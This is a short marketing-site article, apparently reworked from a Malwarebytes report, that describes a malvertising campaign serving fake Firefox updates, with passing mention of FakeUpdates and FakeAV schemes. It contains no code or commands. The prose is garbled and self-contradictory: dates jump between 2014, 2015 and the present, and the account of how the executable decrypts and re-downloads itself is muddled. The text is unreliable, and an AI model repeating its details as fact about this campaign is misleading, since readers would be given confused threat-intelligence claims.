Do you know what questions to ask when you're looking for an IT firm? We're here to help. Get the free guide delivered right to your inbox:
Malware authors and distributors are following the ebbs and flow of the threat landscape. One campaign Malwarebytes Labs has tracked for a number of years recently introduced a new scheme to possibly completely move away from drive-by downloads via exploit kits. Malwarebytes Labs researcher Fillip Mouliatis identified a malvertising campaign leading to a fake Firefox update. The template is strongly inspired from similar schemes and in particular the one distributed by the FakeUpdates (SocGholish) threat actors.
FakeUpdates, FakeAV and malvertising are three very similar categories of threats that use social engineering as one of their main tactics. The campaigns usually use hidden iframes or specially crafted text to redirect the victim towards a malicious website. There they can download packages (typically in executable format) that, when executed on the victim’s device, claim to clean up malware or provide other fake services. Other versions of this threat have been detected using fake Microsoft updates and modified ad servers, which don’t download anything really but still perform malicious activity on an end device. In any case, malvertising campaigns tend to push only one type of product and malware authors consolidate their efforts by switching between campaigns.
Some of the fake updates are misleading with a “Download and free your PC” message in a text that looks like a screenshot of the installer. The file name is something similar to “Security Update 2014-02-05_14.20.257_0x78e6acff82b06e6880d38ea0c1f9a7a27f09d2e1.exe”, which could cause confusion in users’ heads as it leads them to believe that the update is really designed for their operating system and applies to every computer on their network.
The file is actually an EXE that, when run, goes through a few checks to see which version the application is decrypted in memory. If the application is not available in the current registry on the system, it decrypts and executes another copy of itself from a remote location via PowerShell. The executable checks for several components and if they are missing, it downloads them and tries to install them. It then opens a browser window with an ad on it, directing users to continue their browsing experience by clicking on this ad.
The same campaign has also been spreading via malvertising ever since mid-December 2015 when it started hijacking visitors of popular websites like CNN and Fox News promoting security-related topics.